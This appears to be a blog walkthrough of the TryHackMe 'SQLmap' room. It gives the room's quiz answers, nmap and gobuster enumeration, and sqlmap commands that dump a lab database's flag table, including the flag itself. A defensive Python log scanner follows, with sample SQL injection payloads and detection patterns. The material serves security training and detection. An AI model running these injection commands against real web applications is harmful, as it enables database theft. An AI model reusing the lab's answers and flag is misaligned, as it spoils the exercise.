TryHackMe-Walkthrough-SQLmap

JasserLOGCS
4 min read · Feb 27, 2024


SQLMAP : Learn about and use Sqlmap to exploit the web application

room link :

https://tryhackme.com/room/sqlmap

Let's begin:

Task 1: Introduction

What is sqlmap?

sqlmap is an open source penetration testing tool developed by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Installing Sqlmap

If you’re using Kali Linux, sqlmap is pre-installed. Otherwise, you can download it here: https://github.com/sqlmapproject/sqlmap

Task 2: Using SQLmap

Which flag or option will allow you to add a URL to the command?

Answer : -u

Which flag would you use to add data to a POST request?

Answer : --data

There are two parameters: username and password. How would you tell sqlmap to use the username parameter for the attack?

Answer : -p username

Which flag would you use to show the advanced help menu?

Answer : -hh

Which flag allows you to retrieve everything?

Answer : -a

Which flag allows you to select the database name?

Answer : -D

Which flag would you use to retrieve database tables?

Answer : --tables

Which flag allows you to retrieve a table’s columns?

Answer : --columns

Which flag allows you to dump all the database table entries?

Answer : --dump-all

Which flag will give you an interactive SQL Shell prompt?

Answer : --sql-shell

You know the current db type is ‘MYSQL’. Which flag allows you to enumerate only MySQL databases?

Answer : --dbms=MYSQL

Task 3: SQLMap Challenge

What is the name of the interesting directory?

Let's start by enumerating the web server with Nmap:

nmap ip_addr -vv

Port 80 is open, so let's check the web server.

Now let's look for other directories with gobuster or dirbuster:

gobuster dir -u 'http://ip_addr/' -w /usr/share/wordlists/rockyou.txt

Answer : blood

Who is the current db user?

Let's first check the directory we found.

Let's try to log in, then use Burp Suite to intercept the login request and save it to file.txt so we can pass it to sqlmap:

sqlmap -r file.txt --dbs

We find several databases, so let's check which one is the current database:

sqlmap -r file.txt --current-db

And there we go: the current database is named blood.

Answer : blood.

Who is the current db user?

Answer : root

What is the final flag?

Let's use this command to list the columns of the flag table:

sqlmap -u "http://10.10.48.187/blood/view.php?id=1" -D blood -T flag --columns

Now let's dump the flag table to get the flag:

sqlmap -u "http://10.10.48.187/blood/view.php?id=1" -D blood -T flag --dump --dbms=mysql

Answer : thm{sqlm@p_is_L0ve}
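As a defensive counterpart to the walkthrough above, here is an added example (written for this post, not code from the room or from sqlmap) that scans Apache access-log lines for the kind of traffic an automated injection run against /blood/view.php?id=1 leaves behind: the default sqlmap User-Agent and URL-encoded boolean, UNION and time-based probes. The log lines, IPs, timestamps and payloads are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines imitating the lab's view.php?id=1 endpoint
# being probed. IPs, timestamps and payloads are made up for this example.
SAMPLE_LOG = """\
10.10.14.5 - - [27/Feb/2024:10:00:01 +0000] "GET /blood/view.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.9 - - [27/Feb/2024:10:00:02 +0000] "GET /blood/view.php?id=1%27%20AND%201%3D1%20--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.10.14.9 - - [27/Feb/2024:10:00:03 +0000] "GET /blood/view.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.10.14.9 - - [27/Feb/2024:10:00:04 +0000] "GET /blood/view.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [27/Feb/2024:10:00:05 +0000] "GET /blood/index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "method target version" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Patterns are matched against the URL-decoded target, since probes arrive percent-encoded.
INJECTION_PATTERNS = {
    "boolean-probe": re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I),
}

def analyze_log(text):
    """Return (ip, reason, decoded_target) for every line that looks like an injection probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        decoded = unquote_plus(m["target"])
        # sqlmap's default User-Agent starts with "sqlmap/" (assumed default; trivially changed).
        if m["ua"].lower().startswith("sqlmap/"):
            findings.append((m["ip"], "sqlmap-user-agent", decoded))
        for reason, pattern in INJECTION_PATTERNS.items():
            if pattern.search(decoded):
                findings.append((m["ip"], reason, decoded))
    return findings

def suspicious_sources(findings, threshold=2):
    """IPs with at least `threshold` findings: one hit may be noise, a burst is a scan."""
    counts = {}
    for ip, _reason, _target in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for ip, reason, target in hits:
        print(f"{ip}  {reason:18s}  {target}")
    print("suspicious sources:", suspicious_sources(hits))
```

The User-Agent check on its own is weak because the string is trivially changed, which is why the decoded-payload patterns and the per-source count carry the real signal.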

Thank you for your attention and feedback.

#Cybersecurity #SQLInjection #WebAppSecurity #EthicalHacking #TryHackMe #MediumArticle #FeedbackWelcome
